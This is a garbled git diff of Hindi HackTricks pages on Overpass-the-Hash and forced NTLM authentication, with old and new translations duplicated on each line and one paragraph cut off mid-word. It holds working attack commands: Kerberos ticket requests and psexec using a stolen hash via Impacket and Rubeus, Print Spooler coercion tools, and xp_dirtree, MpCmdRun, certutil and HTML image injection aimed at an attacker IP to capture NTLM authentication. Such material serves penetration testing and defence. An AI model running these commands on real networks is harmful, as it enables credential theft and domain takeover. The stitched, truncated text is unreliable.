इस हमले को करने के लिए, **लक्षित उपयोगकर्ता खाते का NTLM हैश (या पासवर्ड) चाहिए**। इसलिए, एक उपयोगकर्ता हैश प्राप्त करने के बाद, उस खाते के लिए एक TGT अनुरोध किया जा सकता है। अंत में, यह संभव होता है कि किसी भी सेवा या मशीन तक पहुंचा जा सके जहां **उपयोगकर्ता खाते की अनुमति होती है** <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details>
## Overpass The Hash/Pass The Key (PTK)
यह हमला **उपयोगकर्ता NTLM हैश या AES कुंजियों का उपयोग करके Kerberos टिकटें अनुरोध करने** का उद्देश्य रखता है, सामान्य Pass The Hash over NTLM प्रोटोकॉल के बजाय। इसलिए, यह **विशेष रूप से उपयोगी हो सकता है उन नेटवर्कों में जहां NTLM प्रोटोकॉल अक्षम है** और केवल **Kerberos को प्रमाणीकरण प्रोटोकॉल के रूप में स्वीकृत किया गया है**
इस हमले को कार्यान्वित करने के लिए, **लक्षित उपयोगकर्ता खाते का NTLM हैश (या पासवर्ड) आवश्यक है**। इसलिए, एक उपयोगकर्ता हैश प्राप्त होने के बाद, उस खाते के लिए एक TGT अनुरोध किया जा सकता है। अंततः, यह संभव है कि **किसी भी सेवा या मशीन तक पहुंचा जा सके** जहां उपयोगकर्ता खाते की अनुमति है।
``` ```
python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
``` ```
आप **विशिष्ट** करने के लिए `-aesKey [AES कुंजी]` निर्दिष्ट कर सकते हैं कि **AES256** का उपयोग करें।\ आप **निर्दिषित** कर सकते हैं `-aesKey [AES कुंजी]` उपयोग करने के लिए **AES256** को निर्दिषित करने के लिए।\
आप टिकट का उपयोग अन्य उपकरणों के साथ भी कर सकते हैं, जैसे: smbexec.py या wmiexec.py आप टिकट का उपयोग अन्य उपकरणों के साथ भी कर सकते हैं: जैसे smbexec.py या wmiexec.py
संभावित समस्याएं: संभावित समस्याएं:
* _PyAsn1Error('NamedTypes can cast only scalar values',)_ : नवीनतम संस्करण में impacket को अपडेट करके हल हो जाती है। * _PyAsn1Error(NamedTypes can cast only scalar values,)_ : अपडेट करके impacket को नवीनतम संस्करण में सुलझाया गया
* _KDC नाम नहीं मिला_ : Kerberos KDC द्वारा मान्यता प्राप्त नहीं होने के कारण, IP पते के बजाय होस्टनाम का उपयोग करके हल हो जाती है। * _KDC cant found the name_ : होस्टनाम का उपयोग करके सुलझाया गया, क्योंकि यह केरबेरोस KDC द्वारा मान्यता प्राप्त नहीं किया गया था
``` ```
.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt .\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd .\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
``` ```
यह प्रकार का हमला **पास द की** के समान है, लेकिन हैश का उपयोग करके टिकट का अनुरोध करने की बजाय, टिकट स्वयं चोरी किया जाता है और इसका उपयोग अपने मालिक के रूप में प्रमाणित करने के लिए किया जाता है। यह प्रकार का हमला **पास द की** के लिए समान है, लेकिन हैश का उपयोग करने की बजाय टिकट को चुराया जाता है और इसका उपयोग अपने मालिक के रूप में प्रमाणित करने के लिए किया जाता है।
{% hint style="warning" %} {% hint style="warning" %}
जब एक TGT का अनुरोध किया जाता है, तो घटना `4768: एक केरबेरोस प्रमाणीकरण टिकट (TGT) का अनुरोध किया गया था` उत्पन्न होती है। आप ऊपर के आउटपुट से देख सकते हैं कि KeyType **RC4-HMAC** (0x17) है, लेकिन Windows के लिए डिफ़ॉल्ट प्रकार अब **AES256** (0x12) है। जब एक टीजीटी का अनुरोध किया जाता है, तो घटना `4768: एक केरबेरोस प्रमाणीकरण टिकट (टीजीटी) का अनुरोध किया गया था` उत्पन्न होती है। आप ऊपर के आउटपुट से देख सकते हैं कि KeyType **RC4-HMAC** (0x17) है, लेकिन Windows के लिए डिफ़ॉल्ट प्रकार अब **AES256** (0x12) है।
{% endhint %} {% endhint %}
```bash ```bash
.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec .\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec
@ -35,10 +49,10 @@ python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) का पता लगाए * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करे
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।** * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details> </details>

View file

@ -1,73 +1,67 @@
# Force NTLM Privileged Authentication # एनटीएलएम विशेषाधिकारिक प्रमाणीकरण को बलपूर्वक करें
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस** प्राप्त करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज़**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मेरा** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**. * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** में पीआर जमा करके।
</details> </details>
## SharpSystemTriggers ## SharpSystemTriggers
[**SharpSystemTriggers**](https://github.com/cube0x0/SharpSystemTriggers) C# में कोडित **रिमोट ऑथेंटिकेशन ट्रिगर्स** का एक **संग्रह** है, जिसे MIDL कंपाइलर का उपयोग करके तीसरे पक्ष की निर्भरताओं से बचने के लिए बनाया गया है। [**SharpSystemTriggers**](https://github.com/cube0x0/SharpSystemTriggers) एक **संग्रह** है जिसमें C# का उपयोग करके MIDL कंपाइलर का उपयोग करके **दूसरों की आवश्यकता नहीं होने पर दूरस्थ प्रमाणीकरण ट्रिगर** कोड किया गया है।
## Spooler Service Abuse ## स्पूलर सेवा दुरुपयोग
यदि _**Print Spooler**_ सेवा **सक्षम** है, तो आप कुछ पहले से ज्ञात AD क्रेडेंशियल्स का उपयोग करके डोमेन कंट्रोलर के प्रिंट सर्वर से नए प्रिंट जॉब्स पर एक **अपडेट** का **अनुरोध** कर सकते हैं और बस उसे किसी सिस्टम को नोटिफिकेशन भेजने के लिए कह सकते हैं।\ यदि _**प्रिंट स्पूलर**_ सेवा **सक्रिय** है, तो आप कुछ पहले से जाने जाने वाले एडी क्रेडेंशियल का उपयोग करके डोमेन कंट्रोलर के प्रिंट सर्वर से नए प्रिंट जॉब्स पर **अपडेट** करने के लिए अनुरोध कर सकते हैं और बस इसे किसी सिस्टम पर **सूचना भेजने** के लिए कह सकते हैं।\
नोट जब प्रिंटर किसी मनमाने सिस्टम को नोटिफिकेशन भेजता है, तो उसे उस **सिस्टम** के खिलाफ **प्रमाणित करना** पड़ता है। इसलिए, एक हमलावर _**Print Spooler**_ सेवा को किसी मनमाने सिस्टम के खिलाफ प्रमाणित करने के लिए बना सकता है, और सेवा इस प्रमाणीकरण में **कंप्यूटर अकाउंट** का उपयोग करेगी। ध्यान दें कि प्रिंटर जब किसी अनिश्चित सिस्टम को सूचना भेजते हैं, तो उसे उस सिस्टम के खिलाफ **प्रमाणीकरण करने की आवश्यकता** होती है। इसलिए, एक हमलावर _**प्रिंट स्पूलर**_ सेवा को किसी अनिश्चित सिस्टम के खिलाफ प्रमाणीकरण करने के लिए बना सकता है, और सेवा **इस प्रमाणीकरण में कंप्यूटर खाता** का उपयोग करेगी।
### डोमेन पर Windows सर्वर्स का पता लगाना ### डोमेन पर विंडोज सर्वर्स खोजना
PowerShell का उपयोग करके, Windows बॉक्सेस की एक सूची प्राप्त करें। सर्वर्स आमतौर पर प्राथमिकता होते हैं, इसलिए वहाँ पर ध्यान केंद्रित करें: PowerShell का उपयोग करके, विंडोज बॉक्स की सूची प्राप्त करें। सर्वर आम तौर पर प्राथमिकता होते हैं, इसलिए हमें वहाँ ध्यान केंद्रित करना चाहिए:
```bash ```bash
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
``` ```
### स्पूलर सेवाएँ सुनना पाना ### स्पूलर सेवाएं सुन रही हैं
थोड़ा संशोधित @mysmartlogin's (Vincent Le Toux's) [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket) का उपयोग करके, देखें कि स्पूलर सेवा सुन रही है या नहीं: थोड़ी बदली हुई @mysmartlogin's (विन्सेंट ले टूक्स) [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket) का उपयोग करके देखें कि क्या स्पूलर सेवा सुन रही है:
```bash ```bash
. .\Get-SpoolStatus.ps1 . .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server} ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}
``` ```
आप Linux पर rpcdump.py का भी उपयोग कर सकते हैं और MS-RPRN प्रोटोकॉल की खोज कर सकते हैं। आप लिनक्स पर rpcdump.py का उपयोग कर सकते हैं और MS-RPRN Protocol के लिए खोज कर सकते हैं।
```bash ```bash
rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
``` ```
### सेवा से किसी मनमाने होस्ट के खिलाफ प्रमाणित करने के लिए कहें ### एक सेवा से किसी भी होस्ट के खिलाफ प्रमाणीकरण करने के लिए सेवा से पूछें
आप [**SpoolSample यहाँ से कंपाइल कर सकते हैं**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**।** आप यहाँ से [**SpoolSample को कंपाइल कर सकते हैं**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**।**
```bash ```bash
SpoolSample.exe <TARGET> <RESPONDERIP> SpoolSample.exe <TARGET> <RESPONDERIP>
``` ```
या उपयोग करें [**3xocyte's dementor.py**](https://github.com/NotMedic/NetNTLMtoSilverTicket) या [**printerbug.py**](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) अगर आप Linux पर हैं या [**3xocyte का dementor.py**](https://github.com/NotMedic/NetNTLMtoSilverTicket) या [**printerbug.py**](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) का उपयोग करें अगर आप Linux पर हैं
```bash ```bash
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET> python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP> printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
``` ```
### अनियंत्रित प्रतिनिधिमंडल के साथ संयोजन ### अनियंत्रित अनुमंडन के साथ संयोजन
यदि हमलावर ने पहले से ही [अनियंत्रित प्रतिनिधिमंडल](unconstrained-delegation.md) वाले कंप्यूटर को समझौता किया है, तो हमलावर **प्रिंटर को इस कंप्यूटर के खिलाफ प्रमाणित करने के लिए मजबूर कर सकता है**। अनियंत्रित प्रतिनिधिमंडल के कारण, **प्रिंटर के कंप्यूटर खाते का TGT** **मेमोरी में संग्रहित किया जाएगा** जिस कंप्यूटर में अनियंत्रित प्रतिनिधिमंडल है। चूंकि हमलावर ने पहले ही इस होस्ट को समझौता किया है, वह **इस टिकट को पुनः प्राप्त करने** और इसका दुरुपयोग करने में सक्षम होगा ([Pass the Ticket](pass-the-ticket.md))। यदि किसी हमलावर ने पहले से ही [अनियंत्रित अनुमंडन](unconstrained-delegation.md) के साथ किसी कंप्यूटर को कंप्रमाइज कर लिया है, तो हमलावर **प्रिंटर को इस कंप्यूटर के खिलाफ प्रमाणीकरण करने** के लिए उपयोग कर सकता है। अनियंत्रित अनुमंडन के कारण, **प्रिंटर के कंप्यूटर खाते का TGT** अनियंत्रित अनुमंडन वाले कंप्यूटर की मेमोरी में **सहेजा जाएगा**। क्योंकि हमलावर ने पहले से ही इस होस्ट को कंप्रमाइज कर लिया है, वह **इस टिकट को पुनः प्राप्त** कर सकेगा और इसका दुरुपयोग कर सकेगा ([टिकट पास करें](pass-the-ticket.md))।
## RCP जबरन प्रमाणीकरण ## RCP बल प्रमाणीकरण
{% embed url="https://github.com/p0dalirius/Coercer" %} {% embed url="https://github.com/p0dalirius/Coercer" %}
## PrivExchange ## PrivExchange
`PrivExchange` हमला **Exchange Server `PushSubscription` सुविधा** में पाए गए एक दोष का परिणाम है। इस सुविधा के अनुसार, Exchange सर्वर को किसी भी डोमेन उपयोगकर्ता द्वारा जिसके पास मेलबॉक्स है, HTTP के माध्यम से किसी भी क्लाइंट-प्रदान किए गए होस्ट के लिए प्रमाणित करने के लिए मजबूर किया जा सकता है `PrivExchange` हमला एक दोष का परिणाम है जो पाया गया है **एक्सचेंज सर्वर `PushSubscription` सुविधा** में। यह सुविधा एक्सचेंज सर्वर को किसी भी डोमेन उपयोगकर्ता के द्वारा बाधित करने की अनुमति देती है ताकि वह HTTP के माध्यम से किसी भी क्लाइंट द्वारा प्रदान किए गए होस्ट को प्रमाणीकृत कर सके
डिफ़ॉल्ट रूप से, **Exchange सेवा SYSTEM के रूप में चलती है** और इसे अत्यधिक विशेषाधिकार दिए जाते हैं (विशेष रूप से, इसके पास **2019 संचयी अपडेट से पहले डोमेन पर WriteDacl विशेषाधिकार होते हैं**)। इस दोष का शोषण करके **LDAP के लिए जानकारी को रिले करने और बाद में डोमेन NTDS डेटाबेस को निकालने** को सक्षम किया जा सकता है। जहां LDAP के लिए रिले करना संभव नहीं है, वहां यह दोष अभी भी डोमेन के भीतर अन्य होस्टों के लिए रिले और प्रमाणित करने के लिए उपयोग किया जा सकता है। इस हमले के सफल शोषण से किसी भी प्रमाणित डोमेन उपयोगकर्ता खाते के साथ तुरंत Domain Admin तक पहुंच प्राप्त होती है। डिफ़ॉल्ट रूप से, **एक्सचेंज सेवा SYSTEM के रूप में चलती है** और इसे अत्यधिक अधिकार (विशेष रूप से, यह **डोमेन पूर्व-2019 संचयी अपड
## Windows के अंदर
यदि आप पहले से ही Windows मशीन के अंदर हैं तो आप निम्नलिखित का उपयोग करके Windows को विशेषाधिकार प्राप्त खातों के साथ सर्वर से जोड़ने के लिए मजबूर कर सकते हैं:
### Defender MpCmdRun
```bash ```bash
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt
``` ```
@ -75,41 +69,29 @@ C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -S
```sql ```sql
EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1 EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
``` ```
या इस अन्य तकनीक का उपयोग करें: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce) या इस दूसरी तकनीक का उपयोग करें: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce)
### Certutil ### Certutil
certutil.exe lolbin (Microsoft-हस्ताक्षरित बाइनरी) का उपयोग करके NTLM प्रमाणीकरण को मजबूर करना संभव है: Certutil.exe lolbin (Microsoft-signed binary) का उपयोग करके NTLM प्रमाणीकरण को बलपूर्वक करना संभव है:
```bash ```bash
certutil.exe -syncwithWU \\127.0.0.1\share certutil.exe -syncwithWU \\127.0.0.1\share
``` ```
## HTML इजेक्शन ## HTML इन्जेक्शन
### ईमेल के माध्यम से ### ईमेल के माध्यम से
यदि आप उस उपयोगकर्ता का **ईमेल पता** जानते हैं जो आपके द्वारा समझौता करने के लिए मशीन में लॉग इन करता है, तो आप उसे **1x1 इमेज के साथ एक ईमेल** भेज सकते हैं जैसे यदि आपके पास उस उपयोगकर्ता का **ईमेल पता** है जो आपके द्वारा कंप्रमाइज़ करना चाहते हैं, तो आप उसे एक **1x1 छवि** के साथ एक ईमेल भेज सकते हैं जैसे कि
```html ```html
<img src="\\10.10.17.231\test.ico" height="1" width="1" /> <img src="\\10.10.17.231\test.ico" height="1" width="1" />
``` ```
### MitM ### MitM
यदि आप किसी कंप्यूटर पर MitM हमला कर सकते हैं और उस पेज में HTML इंजेक्ट कर सकते हैं जिसे वह देख रहा हो, तो आप उस पेज में निम्नलिखित जैसी इमेज इंजेक्ट करने का प्रयास कर सकते हैं: यदि आप किसी कंप्यूटर पर MitM हमला कर सकते हैं और उस पेज में HTML इंजेक्ट कर सकते हैं जिसे वह देखेगा, तो आप पेज में निम्नलिखित तरह की छवि इंजेक्ट करने की कोशिश कर सकते हैं:
```html ```html
<img src="\\10.10.17.231\test.ico" height="1" width="1" /> <img src="\\10.10.17.231\test.ico" height="1" width="1" />
``` ```
## NTLMv1 क्रैक करना ## NTLMv1 क्रैकिंग
यदि आप [NTLMv1 चैलेंजेस कैप्चर कर सकते हैं, तो यहां पढ़ें कि उन्हें कैसे क्रैक करें](../ntlm/#ntlmv1-attack).\ यदि आप [NTLMv1 चैलेंज कैप्चर कर सकते हैं तो यहाँ पढ़ें कैसे उन्हें क्रैक करें](../ntlm/#ntlmv1-attack)।\
_याद रखें कि NTLMv1 क्रैक करने के लिए आपको Responder चैलेंज को "1122334455667788" पर सेट करना होगा_ _ध्यान रखें कि NTLMv1 को क्रैक करने के लिए आपको रिस्पॉंडर चैलेंज को "1122334455667788" पर सेट करना होगा_
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुंच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**.
</details>

View file

@ -4,10 +4,10 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपन**कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपक**कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस चाहिए**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह। * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
